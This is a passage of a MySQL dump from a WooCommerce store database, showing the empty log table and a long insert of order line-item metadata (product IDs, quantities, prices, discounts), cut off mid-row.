  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `level` smallint(4) NOT NULL,
  `source` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `message` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `context` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`log_id`),
  KEY `level` (`level`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_log`
--

LOCK TABLES `wpxb_woocommerce_log` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_order_itemmeta`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_order_itemmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_order_itemmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `order_item_id` (`order_item_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2131 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_order_itemmeta`
--

LOCK TABLES `wpxb_woocommerce_order_itemmeta` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_order_itemmeta` DISABLE KEYS */;
INSERT INTO `wpxb_woocommerce_order_itemmeta` VALUES (1,1,'_qty','1'),(2,1,'_tax_class',''),(3,1,'_product_id','28'),(4,1,'_variation_id','0'),(5,1,'_line_subtotal','750'),(6,1,'_line_total','750'),(7,1,'_line_subtotal_tax','0'),(8,1,'_line_tax','0'),(9,1,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(10,2,'_qty','1'),(11,2,'_tax_class',''),(12,2,'_product_id','78'),(13,2,'_variation_id','0'),(14,2,'_line_subtotal','2250'),(15,2,'_line_total','2250'),(16,2,'_line_subtotal_tax','0'),(17,2,'_line_tax','0'),(18,2,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(19,3,'_qty','1'),(20,3,'_tax_class',''),(21,3,'_product_id','65'),(22,3,'_variation_id','0'),(23,3,'_line_subtotal','450'),(24,3,'_line_total','450'),(25,3,'_line_subtotal_tax','0'),(26,3,'_line_tax','0'),(27,3,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(28,4,'_qty','1'),(29,4,'_tax_class',''),(30,4,'_product_id','67'),(31,4,'_variation_id','0'),(32,4,'_line_subtotal','450'),(33,4,'_line_total','450'),(34,4,'_line_subtotal_tax','0'),(35,4,'_line_tax','0'),(36,4,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(37,5,'_qty','1'),(38,5,'_tax_class',''),(39,5,'_product_id','64'),(40,5,'_variation_id','0'),(41,5,'_line_subtotal','2250'),(42,5,'_line_total','2250'),(43,5,'_line_subtotal_tax','0'),(44,5,'_line_tax','0'),(45,5,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(46,6,'_qty','1'),(47,6,'_tax_class',''),(48,6,'_product_id','76'),(49,6,'_variation_id','0'),(50,6,'_line_subtotal','750'),(51,6,'_line_total','750'),(52,6,'_line_subtotal_tax','0'),(53,6,'_line_tax','0'),(54,6,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(55,7,'_qty','1'),(56,7,'_tax_class',''),(57,7,'_product_id','79'),(58,7,'_variation_id','0'),(59,7,'_line_subtotal','199'),(60,7,'_line_total','199'),(61,7,'_line_subtotal_tax','0'),(62,7,'_line_tax','0'),(63,7,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(64,8,'_qty','1'),(65,8,'_tax_class',''),(66,8,'_product_id','65'),(67,8,'_variation_id','0'),(68,8,'_line_subtotal','450'),(69,8,'_line_total','450'),(70,8,'_line_subtotal_tax','0'),(71,8,'_line_tax','0'),(72,8,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(73,9,'_qty','1'),(74,9,'_tax_class',''),(75,9,'_product_id','28'),(76,9,'_variation_id','0'),(77,9,'_line_subtotal','750'),(78,9,'_line_total','750'),(79,9,'_line_subtotal_tax','0'),(80,9,'_line_tax','0'),(81,9,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(82,10,'_qty','1'),(83,10,'_tax_class',''),(84,10,'_product_id','68'),(85,10,'_variation_id','0'),(86,10,'_line_subtotal','450'),(87,10,'_line_total','450'),(88,10,'_line_subtotal_tax','0'),(89,10,'_line_tax','0'),(90,10,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(91,11,'_qty','1'),(92,11,'_tax_class',''),(93,11,'_product_id','73'),(94,11,'_variation_id','0'),(95,11,'_line_subtotal','500'),(96,11,'_line_total','500'),(97,11,'_line_subtotal_tax','0'),(98,11,'_line_tax','0'),(99,11,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(100,12,'_qty','1'),(101,12,'_tax_class',''),(102,12,'_product_id','28'),(103,12,'_variation_id','0'),(104,12,'_line_subtotal','750'),(105,12,'_line_total','750'),(106,12,'_line_subtotal_tax','0'),(107,12,'_line_tax','0'),(108,12,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(109,13,'_qty','1'),(110,13,'_tax_class',''),(111,13,'_product_id','59'),(112,13,'_variation_id','0'),(113,13,'_line_subtotal','1500'),(114,13,'_line_total','1500'),(115,13,'_line_subtotal_tax','0'),(116,13,'_line_tax','0'),(117,13,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(118,14,'_qty','1'),(119,14,'_tax_class',''),(120,14,'_product_id','28'),(121,14,'_variation_id','0'),(122,14,'_line_subtotal','750'),(123,14,'_line_total','750'),(124,14,'_line_subtotal_tax','0'),(125,14,'_line_tax','0'),(126,14,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(127,15,'_qty','1'),(128,15,'_tax_class',''),(129,15,'_product_id','59'),(130,15,'_variation_id','0'),(131,15,'_line_subtotal','1500'),(132,15,'_line_total','1500'),(133,15,'_line_subtotal_tax','0'),(134,15,'_line_tax','0'),(135,15,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(136,16,'_qty','1'),(137,16,'_tax_class',''),(138,16,'_product_id','79'),(139,16,'_variation_id','0'),(140,16,'_line_subtotal','199'),(141,16,'_line_total','6'),(142,16,'_line_subtotal_tax','0'),(143,16,'_line_tax','0'),(144,16,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(145,17,'discount_amount','193'),(146,17,'discount_amount_tax','0'),(147,18,'_qty','1'),(148,18,'_tax_class',''),(149,18,'_product_id','28'),(150,18,'_variation_id','0'),(151,18,'_line_subtotal','750'),(152,18,'_line_total','6'),(153,18,'_line_subtotal_tax','0'),(154,18,'_line_tax','0'),(155,18,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(156,19,'discount_amount','744'),(157,19,'discount_amount_tax','0'),(158,20,'_qty','1'),(159,20,'_tax_class',''),(160,20,'_product_id','28'),(161,20,'_variation_id','0'),(162,20,'_line_subtotal','750'),(163,20,'_line_total','750'),(164,20,'_line_subtotal_tax','0'),(165,20,'_line_tax','0'),(166,20,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(167,21,'_qty','1'),(168,21,'_tax_class',''),(169,21,'_product_id','28'),(170,21,'_variation_id','0'),(171,21,'_line_subtotal','750'),(172,21,'_line_total','750'),(173,21,'_line_subtotal_tax','0'),(174,21,'_line_tax','0'),(175,21,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(185,23,'_qty','1'),(186,23,'_tax_class',''),(187,23,'_product_id','28'),(188,23,'_variation_id','0'),(189,23,'_line_subtotal','750'),(190,23,'_line_total','750'),(191,23,'_line_subtotal_tax','0'),(192,23,'_line_tax','0'),(193,23,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(194,24,'_qty','1'),(195,24,'_tax_class',''),(196,24,'_product_id','70'),(197,24,'_variation_id','0'),(198,24,'_line_subtotal','450'),(199,24,'_line_total','450'),(200,24,'_line_subtotal_tax','0'),(201,24,'_line_tax','0'),(202,24,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(203,25,'_qty','1'),(204,25,'_tax_class',''),(205,25,'_product_id','65'),(206,25,'_variation_id','0'),(207,25,'_line_subtotal','450'),(208,25,'_line_total','450'),(209,25,'_line_subtotal_tax','0'),(210,25,'_line_tax','0'),(211,25,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(212,26,'_qty','1'),(213,26,'_tax_class',''),(214,26,'_product_id','80'),(215,26,'_variation_id','0'),(216,26,'_line_subtotal','199'),(217,26,'_line_total','199'),(218,26,'_line_subtotal_tax','0'),(219,26,'_line_tax','0'),(220,26,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(221,27,'_qty','1'),(222,27,'_tax_class',''),(223,27,'_product_id','28'),(224,27,'_variation_id','0'),(225,27,'_line_subtotal','750'),(226,27,'_line_total','750'),(227,27,'_line_subtotal_tax','0'),(228,27,'_line_tax','0'),(229,27,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(230,28,'_qty','1'),(231,28,'_tax_class',''),(232,28,'_product_id','237'),(233,28,'_variation_id','0'),(234,28,'_line_subtotal','5000'),(235,28,'_line_total','5000'),(236,28,'_line_subtotal_tax','0'),(237,28,'_line_tax','0'),(238,28,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(239,29,'_qty','1'),(240,29,'_tax_class',''),(241,29,'_product_id','75'),(242,29,'_variation_id','0'),(243,29,'_line_subtotal','1500'),(244,29,'_line_total','1500'),(245,29,'_line_subtotal_tax','0'),(246,29,'_line_tax','0'),(247,29,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(248,30,'_qty','1'),(249,30,'_tax_class',''),(250,30,'_product_id','75'),(251,30,'_variation_id','0'),(252,30,'_line_subtotal','1500'),(253,30,'_line_total','1500'),(254,30,'_line_subtotal_tax','0'),(255,30,'_line_tax','0'),(256,30,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(257,31,'_qty','1'),(258,31,'_tax_class',''),(259,31,'_product_id','28'),(260,31,'_variation_id','0'),(261,31,'_line_subtotal','750'),(262,31,'_line_total','750'),(263,31,'_line_subtotal_tax','0'),(264,31,'_line_tax','0'),(265,31,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(266,32,'_qty','1'),(267,32,'_tax_class',''),(268,32,'_product_id','70'),(269,32,'_variation_id','0'),(270,32,'_line_subtotal','450'),(271,32,'_line_total','450'),(272,32,'_line_subtotal_tax','0'),(273,32,'_line_tax','0'),(274,32,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(275,33,'_product_id','64'),(276,33,'_variation_id','0'),(277,33,'_qty','1'),(278,33,'_tax_class',''),(279,33,'_line_subtotal','2250'),(280,33,'_line_subtotal_tax','0'),(281,33,'_line_total','2250'),(282,33,'_line_tax','0'),(283,33,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(284,34,'_product_id','28'),(285,34,'_variation_id','0'),(286,34,'_qty','1'),(287,34,'_tax_class',''),(288,34,'_line_subtotal','750'),(289,34,'_line_subtotal_tax','0'),(290,34,'_line_total','750'),(291,34,'_line_tax','0'),(292,34,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(293,35,'_product_id','28'),(294,35,'_variation_id','0'),(295,35,'_qty','1'),(296,35,'_tax_class',''),(297,35,'_line_subtotal','750'),(298,35,'_line_subtotal_tax','0'),(299,35,'_line_total','750'),(300,35,'_line_tax','0'),(301,35,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(302,36,'_product_id','28'),(303,36,'_variation_id','0'),(304,36,'_qty','1'),(305,36,'_tax_class',''),(306,36,'_line_subtotal','750'),(307,36,'_line_subtotal_tax','0'),(308,36,'_line_total','750'),(309,36,'_line_tax','0'),(310,36,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(311,37,'_product_id','28'),(312,37,'_variation_id','0'),(313,37,'_qty','1'),(314,37,'_tax_class',''),(315,37,'_line_subtotal','750'),(316,37,'_line_subtotal_tax','0'),(317,37,'_line_total','375'),(318,37,'_line_tax','0'),(319,37,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(320,38,'discount_amount','375'),(321,38,'discount_amount_tax','0'),(322,39,'_product_id','28'),(323,39,'_variation_id','0'),(324,39,'_qty','1'),(325,39,'_tax_class',''),(326,39,'_line_subtotal','750'),(327,39,'_line_subtotal_tax','0'),(328,39,'_line_total','750'),(329,39,'_line_tax','0'),(330,39,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(331,40,'_product_id','78'),(332,40,'_variation_id','0'),(333,40,'_qty','1'),(334,40,'_tax_class',''),(335,40,'_line_subtotal','2250'),(336,40,'_line_subtotal_tax','0'),(337,40,'_line_total','2250'),(338,40,'_line_tax','0'),(339,40,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(340,41,'_product_id','28'),(341,41,'_variation_id','0'),(342,41,'_qty','1'),(343,41,'_tax_class',''),(344,41,'_line_subtotal','750'),(345,41,'_line_subtotal_tax','0'),(346,41,'_line_total','750'),(347,41,'_line_tax','0'),(348,41,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(349,42,'_product_id','59'),(350,42,'_variation_id','0'),(351,42,'_qty','1'),(352,42,'_tax_class',''),(353,42,'_line_subtotal','1500'),(354,42,'_line_subtotal_tax','0'),(355,42,'_line_total','1500'),(356,42,'_line_tax','0'),(357,42,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(358,43,'_product_id','76'),(359,43,'_variation_id','0'),(360,43,'_qty','1'),(361,43,'_tax_class',''),(362,43,'_line_subtotal','750'),(363,43,'_line_subtotal_tax','0'),(364,43,'_line_total','750'),(365,43,'_line_tax','0'),(366,43,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(367,44,'_product_id','237'),(368,44,'_variation_id','0'),(369,44,'_qty','1'),(370,44,'_tax_class',''),(371,44,'_line_subtotal','5000'),(372,44,'_line_subtotal_tax','0'),(373,44,'_line_total','5000'),(374,44,'_line_tax','0'),(375,44,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(376,45,'_product_id','75'),(377,45,'_variation_id','0'),(378,45,'_qty','1'),(379,45,'_tax_class',''),(380,45,'_line_subtotal','1500'),(381,45,'_line_subtotal_tax','0'),(382,45,'_line_total','1500'),(383,45,'_line_tax','0'),(384,45,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(385,46,'_product_id','76'),(386,46,'_variation_id','0'),(387,46,'_qty','1'),(388,46,'_tax_class',''),(389,46,'_line_subtotal','750'),(390,46,'_line_subtotal_tax','0'),(391,46,'_line_total','750'),(392,46,'_line_tax','0'),(393,46,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(394,47,'_product_id','74'),(395,47,'_variation_id','0'),(396,47,'_qty','1'),(397,47,'_tax_class',''),(398,47,'_line_subtotal','450'),(399,47,'_line_subtotal_tax','0'),(400,47,'_line_total','450'),(401,47,'_line_tax','0'),(402,47,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(403,48,'_product_id','78'),(404,48,'_variation_id','0'),(405,48,'_qty','1'),(406,48,'_tax_class',''),(407,48,'_line_subtotal','2250'),(408,48,'_line_subtotal_tax','0'),(409,48,'_line_total','2250'),(410,48,'_line_tax','0'),(411,48,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(412,49,'_product_id','77'),(413,49,'_variation_id','0'),(414,49,'_qty','1'),(415,49,'_tax_class',''),(416,49,'_line_subtotal','3500'),(417,49,'_line_subtotal_tax','0'),(418,49,'_line_total','3500'),(419,49,'_line_tax','0'),(420,49,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(421,50,'_product_id','70'),(422,50,'_variation_id','0'),(423,50,'_qty','1'),(424,50,'_tax_class',''),(425,50,'_line_subtotal','450'),(426,50,'_line_subtotal_tax','0'),(427,50,'_line_total','450'),(428,50,'_line_tax','0'),(429,50,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(430,51,'_product_id','72'),(431,51,'_variation_id','0'),(432,51,'_qty','1'),(433,51,'_tax_class',''),(434,51,'_line_subtotal','3500'),(435,51,'_line_subtotal_tax','0'),(436,51,'_line_total','3500'),(437,51,'_line_tax','0'),(438,51,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(439,52,'_product_id','68'),(440,52,'_variation_id','0'),(441,52,'_qty','1'),(442,52,'_tax_class',''),(443,52,'_line_subtotal','450'),(444,52,'_line_subtotal_tax','0'),(445,52,'_line_total','450'),(446,52,'_line_tax','0'),(447,52,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(448,53,'_product_id','79'),(449,53,'_variation_id','0'),(450,53,'_qty','1'),(451,53,'_tax_class',''),(452,53,'_line_subtotal','199'),(453,53,'_line_subtotal_tax','0'),(454,53,'_line_total','199'),(455,53,'_line_tax','0'),(456,53,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(457,54,'_product_id','67'),(458,54,'_variation_id','0'),(459,54,'_qty','1'),(460,54,'_tax_class',''),(461,54,'_line_subtotal','450'),(462,54,'_line_subtotal_tax','0'),(463,54,'_line_total','450'),(464,54,'_line_tax','0'),(465,54,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(466,55,'_product_id','80'),(467,55,'_variation_id','0'),(468,55,'_qty','1'),(469,55,'_tax_class',''),(470,55,'_line_subtotal','199'),(471,55,'_line_subtotal_tax','0'),(472,55,'_line_total','199'),(473,55,'_line_tax','0'),(474,55,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(475,56,'_product_id','28'),(476,56,'_variation_id','0'),(477,56,'_qty','1'),(478,56,'_tax_class',''),(479,56,'_line_subtotal','750'),(480,56,'_line_subtotal_tax','0'),(481,56,'_line_total','750'),(482,56,'_line_tax','0'),(483,56,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(484,57,'_product_id','70'),(485,57,'_variation_id','0'),(486,57,'_qty','1'),(487,57,'_tax_class',''),(488,57,'_line_subtotal','450'),(489,57,'_line_subtotal_tax','0'),(490,57,'_line_total','450'),(491,57,'_line_tax','0'),(492,57,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(493,58,'_product_id','28090'),(494,58,'_variation_id','0'),(495,58,'_qty','1'),(496,58,'_tax_class',''),(497,58,'_line_subtotal','1899'),(498,58,'_line_subtotal_tax','0'),(499,58,'_line_total','1899'),(500,58,'_line_tax','0'),(501,58,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(502,59,'_product_id','69'),(503,59,'_variation_id','0'),(504,59,'_qty','1'),(505,59,'_tax_class',''),(506,59,'_line_subtotal','450'),(507,59,'_line_subtotal_tax','0'),(508,59,'_line_total','450'),(509,59,'_line_tax','0'),(510,59,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(511,60,'_product_id','59'),(512,60,'_variation_id','0'),(513,60,'_qty','1'),(514,60,'_tax_class',''),(515,60,'_line_subtotal','1500'),(516,60,'_line_subtotal_tax','0'),(517,60,'_line_total','1500'),(518,60,'_line_tax','0'),(519,60,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(520,61,'_product_id','28'),(521,61,'_variation_id','0'),(522,61,'_qty','1'),(523,61,'_tax_class',''),(524,61,'_line_subtotal','750'),(525,61,'_line_subtotal_tax','0'),(526,61,'_line_total','750'),(527,61,'_line_tax','0'),(528,61,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(529,62,'_product_id','59'),(530,62,'_variation_id','0'),(531,62,'_qty','1'),(532,62,'_tax_class',''),(533,62,'_line_subtotal','1500'),(534,62,'_line_subtotal_tax','0'),(535,62,'_line_total','1500'),(536,62,'_line_tax','0'),(537,62,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(538,63,'_product_id','28092'),(539,63,'_variation_id','0'),(540,63,'_qty','1'),(541,63,'_tax_class',''),(542,63,'_line_subtotal','5999'),(543,63,'_line_subtotal_tax','0'),(544,63,'_line_total','5999'),(545,63,'_line_tax','0'),(546,63,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(547,64,'_product_id','28088'),(548,64,'_variation_id','0'),(549,64,'_qty','1'),(550,64,'_tax_class',''),(551,64,'_line_subtotal','999'),(552,64,'_line_subtotal_tax','0'),(553,64,'_line_total','999'),(554,64,'_line_tax','0'),(555,64,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(556,65,'_product_id','28'),(557,65,'_variation_id','0'),(558,65,'_qty','1'),(559,65,'_tax_class',''),(560,65,'_line_subtotal','750'),(561,65,'_line_subtotal_tax','0'),(562,65,'_line_total','750'),(563,65,'_line_tax','0'),(564,65,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(565,66,'_product_id','78'),(566,66,'_variation_id','0'),(567,66,'_qty','1'),(568,66,'_tax_class',''),(569,66,'_line_subtotal','2250'),(570,66,'_line_subtotal_tax','0'),(571,66,'_line_total','2250'),(572,66,'_line_tax','0'),(573,66,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(574,67,'_product_id','75'),(575,67,'_variation_id','0'),(576,67,'_qty','1'),(577,67,'_tax_class',''),(578,67,'_line_subtotal','1500'),(579,67,'_line_subtotal_tax','0'),(580,67,'_line_total','1500'),(581,67,'_line_tax','0'),(582,67,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(583,68,'_product_id','75'),(584,68,'_variation_id','0'),(585,68,'_qty','1'),(586,68,'_tax_class',''),(587,68,'_line_subtotal','1500'),(588,68,'_line_subtotal_tax','0'),(589,68,'_line_total','1500'),(590,68,'_line_tax','0'),(591,68,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(592,69,'_product_id','28'),(593,69,'_variation_id','0'),(594,69,'_qty','1'),(595,69,'_tax_class',''),(596,69,'_line_subtotal','750'),(597,69,'_line_subtotal_tax','0'),(598,69,'_line_total','750'),(599,69,'_line_tax','0'),(600,69,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(601,70,'_product_id','28'),(602,70,'_variation_id','0'),(603,70,'_qty','1'),(604,70,'_tax_class',''),(605,70,'_line_subtotal','750'),(606,70,'_line_subtotal_tax','0'),(607,70,'_line_total','750'),(608,70,'_line_tax','0'),(609,70,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(610,71,'_product_id','28'),(611,71,'_variation_id','0'),(612,71,'_qty','1'),(613,71,'_tax_class',''),(614,71,'_line_subtotal','750'),(615,71,'_line_subtotal_tax','0'),(616,71,'_line_total','750'),(617,71,'_line_tax','0'),(618,71,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(619,72,'_product_id','62'),(620,72,'_variation_id','0'),(621,72,'_qty','1'),(622,72,'_tax_class',''),(623,72,'_line_subtotal','4650'),(624,72,'_line_subtotal_tax','0'),(625,72,'_line_total','4650'),(626,72,'_line_tax','0'),(627,72,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(628,73,'_product_id','62'),(629,73,'_variation_id','0'),(630,73,'_qty','1'),(631,73,'_tax_class',''),(632,73,'_line_subtotal','4650'),(633,73,'_line_subtotal_tax','0'),(634,73,'_line_total','4650'),(635,73,'_line_tax','0'),(636,73,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(637,74,'_product_id','62'),(638,74,'_variation_id','0'),(639,74,'_qty','1'),(640,74,'_tax_class',''),(641,74,'_line_subtotal','4650'),(642,74,'_line_subtotal_tax','0'),(643,74,'_line_total','4650'),(644,74,'_line_tax','0'),(645,74,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(646,75,'_product_id','62'),(647,75,'_variation_id','0'),(648,75,'_qty','1'),(649,75,'_tax_class',''),(650,75,'_line_subtotal','4650'),(651,75,'_line_subtotal_tax','0'),(652,75,'_line_total','4650'),(653,75,'_line_tax','0'),(654,75,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(655,76,'_product_id','59'),(656,76,'_variation_id','0'),(657,76,'_qty','1'),(658,76,'_tax_class',''),(659,76,'_line_subtotal','1500'),(660,76,'_line_subtotal_tax','0'),(661,76,'_line_total','1500'),(662,76,'_line_tax','0'),(663,76,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(664,77,'_product_id','59'),(665,77,'_variation_id','0'),(666,77,'_qty','1'),(667,77,'_tax_class',''),(668,77,'_line_subtotal','1500'),(669,77,'_line_subtotal_tax','0'),(670,77,'_line_total','1500'),(671,77,'_line_tax','0'),(672,77,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(673,78,'_product_id','28'),(674,78,'_variation_id','0'),(675,78,'_qty','1'),(676,78,'_tax_class',''),(677,78,'_line_subtotal','750'),(678,78,'_line_subtotal_tax','0'),(679,78,'_line_total','750'),(680,78,'_line_tax','0'),(681,78,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(682,79,'_product_id','28090'),(683,79,'_variation_id','0'),(684,79,'_qty','1'),(685,79,'_tax_class',''),(686,79,'_line_subtotal','1699'),(687,79,'_line_subtotal_tax','0'),(688,79,'_line_total','1699'),(689,79,'_line_tax','0'),(690,79,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(691,80,'_product_id','28092'),(692,80,'_variation_id','0'),(693,80,'_qty','1'),(694,80,'_tax_class',''),(695,80,'_line_subtotal','5999'),(696,80,'_line_subtotal_tax','0'),(697,80,'_line_total','5999'),(698,80,'_line_tax','0'),(699,80,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(700,81,'_product_id','28'),(701,81,'_variation_id','0'),(702,81,'_qty','1'),(703,81,'_tax_class',''),(704,81,'_line_subtotal','750'),(705,81,'_line_subtotal_tax','0'),(706,81,'_line_total','750'),(707,81,'_line_tax','0'),(708,81,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(709,82,'_product_id','28091'),(710,82,'_variation_id','0'),(711,82,'_qty','1'),(712,82,'_tax_class',''),(713,82,'_line_subtotal','4999'),(714,82,'_line_subtotal_tax','0'),(715,82,'_line_total','4999'),(716,82,'_line_tax','0'),(717,82,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(718,83,'